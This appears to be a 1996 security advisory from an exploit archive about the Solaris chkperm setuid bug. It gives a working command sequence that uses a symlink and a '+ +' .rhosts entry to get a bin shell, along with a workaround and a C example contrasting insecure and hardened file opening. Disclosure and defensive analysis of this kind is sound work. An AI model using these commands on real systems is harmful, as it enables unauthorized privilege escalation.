Solaris chkperm vulnerability

Summary

Description: Solaris 2.4's /usr/vmsys/bin/chkperm creates $VMSYS/.facerc in a laughably insecure fashion.
Author: Duncan Simpson <dps@IO.STARGATE.CO.UK>
Compromise: bin, which trivially leads to root (local)
Vulnerable Systems: Solaris 2.4, NOT 2.5 or 2.5.1; the author is apparently wrong about this.
Date: 5 December 1996

Details

Exploit:

From: Kevin L Prigge (Kevin.L.Prigge-2@tc.umn.edu)
Date: Thu, 5 Dec 1996 12:55:16 -0600 

Problem: Vulnerabilities in /usr/vmsys/bin/chkperm
Platform: Solaris 2.4, 2.5, 2.5.1, other System V derived
          systems with the FACE package installed
Impact:  Local users can overwrite bin owned files with
         zero length files. Local users can create world
         writable bin owned files. Account bin can be
         compromised.
Solution: Remove the suid/sgid bit from the program until
          a patch is available

------------------------------------------------------------------------

PROBLEM DESCRIPTION

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package
called FACE (Framed Access Command Environment) installed. Included in
the package is a program called chkperm which checks a file to see if
the user has permission to use the FACE interface. This program is
installed suid and sgid bin, and is trivially exploitable to
compromise the bin account.  And in Solaris, which installs many/most
of the system binaries as bin, it may be said that "binliness is next
to rootliness."

The FACE package comes from System V, and may be available under other
SYSV based systems.  We welcome reports of other vulnerable systems.

This vulnerability is believed to be known to the intruder community.

------------------------------------------------------------------------

PLATFORMS AFFECTED

Solaris 2.x, possibly other SYSVR4 derived systems. We welcome
reports of other vulnerable systems.

------------------------------------------------------------------------

IMPACT

Local user can gain system privileges as bin (root follows shortly)

------------------------------------------------------------------------

SUGGESTED WORKAROUND

% chmod ug-s /usr/vmsys/bin/chkperm

------------------------------------------------------------------------

EXAMPLE

% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw-  2 bin      bin            0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw-  2 bin      bin            4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell...
% id
uid=2(bin) gid=2(bin)

------------------------------------------------------------------------

DISCUSSION

The program (which resides at /usr/vmsys/bin/chkperm) does several
things in an insecure fashion:

1) It tries to open the file $VMSYS/.facerc and if the file is not
   present it creates it, with zero length, ownership bin.bin

2) The user's UMASK is inherited, so permissions on the newly-created
   .facerc are under the control of an attacker.

3) VMSYS by default is set to /usr/lib, but the program cheerfully
   checks your environment for a different VMSYS base directory, and
   uses that.

4) There is no check made for symbolic links, avoiding the need to
   race.

This exploit is far from original, though it appears to be unpublished
as yet.  Blindly following symlinks, following without checking for
existence or matching ownership, inheriting the user's environment,
are examples of very naive programming wholly inappropriate for a
program installed setuid to a system account.

Sun's practice of shipping their system binaries and binaries
directories owned and writable by bin certainly contributes to making
this exposure more effective and dangerous.

Kevin Prigge   
John Ladwig    
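The four weaknesses listed under DISCUSSION (environment-controlled path, inherited umask, no symlink check, no ownership check) reproduced in a small C program beside a hardened open. This is an added illustration, not the FACE chkperm source; it assumes O_NOFOLLOW (POSIX.1-2008, absent on Solaris 2.4, where an lstat/fstat comparison would stand in), follows the $VMSYS/lib/.facerc path used in the EXAMPLE, and builds its scenario in a constructed temporary directory.

```c
#define _GNU_SOURCE              /* for O_NOFOLLOW, mkdtemp, setenv on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Insecure pattern from the advisory: base dir from the caller's environment,
 * symlinks followed, mode 0666 limited only by the caller's umask. */
int facerc_open_insecure(void) {
    char path[512];
    const char *base = getenv("VMSYS");
    snprintf(path, sizeof path, "%s/lib/.facerc", base ? base : "/usr/lib");
    return open(path, O_RDWR | O_CREAT, 0666);
}

/* Hardened: base dir fixed by the program, symlinks refused (O_NOFOLLOW), explicit
 * 0600 on create, object verified as a regular file owned by the effective uid. */
int facerc_open_hardened(const char *base) {
    char path[512]; struct stat st;
    snprintf(path, sizeof path, "%s/lib/.facerc", base);
    int fd = open(path, O_RDWR | O_NOFOLLOW);          /* existing file, never a link */
    if (fd < 0 && errno == ENOENT)                     /* create only if truly absent */
        fd = open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        st.st_uid != geteuid()) { close(fd); return -1; }
    return fd;
}

/* Constructed demo mirroring the EXAMPLE above in a throwaway temp dir:
 * $VMSYS/lib/.facerc is a symlink to a not-yet-existing "victim" file. Bit 1: insecure
 * open created the victim through the link; bit 2: hardened open refused the link;
 * bit 4: hardened open succeeds once the link is gone. Returns 7 when all three hold. */
int demo_symlink_attack(void) {
    char dir[] = "/tmp/facercXXXXXX", lib[64], lnk[64], victim[64];
    int result = 0, fd;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(lib, sizeof lib, "%s/lib", dir);
    snprintf(lnk, sizeof lnk, "%s/lib/.facerc", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (mkdir(lib, 0777) < 0 || symlink(victim, lnk) < 0) return -1;
    setenv("VMSYS", dir, 1);                           /* attacker-chosen base dir */
    if ((fd = facerc_open_insecure()) >= 0) { close(fd); if (access(victim, F_OK) == 0) result |= 1; }
    if (facerc_open_hardened(dir) < 0) result |= 2;
    unlink(lnk);
    if ((fd = facerc_open_hardened(dir)) >= 0) { close(fd); result |= 4; }
    unlink(lnk); unlink(victim); rmdir(lib); rmdir(dir);
    return result;
}
```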

This page is part of Fyodor's exploit world.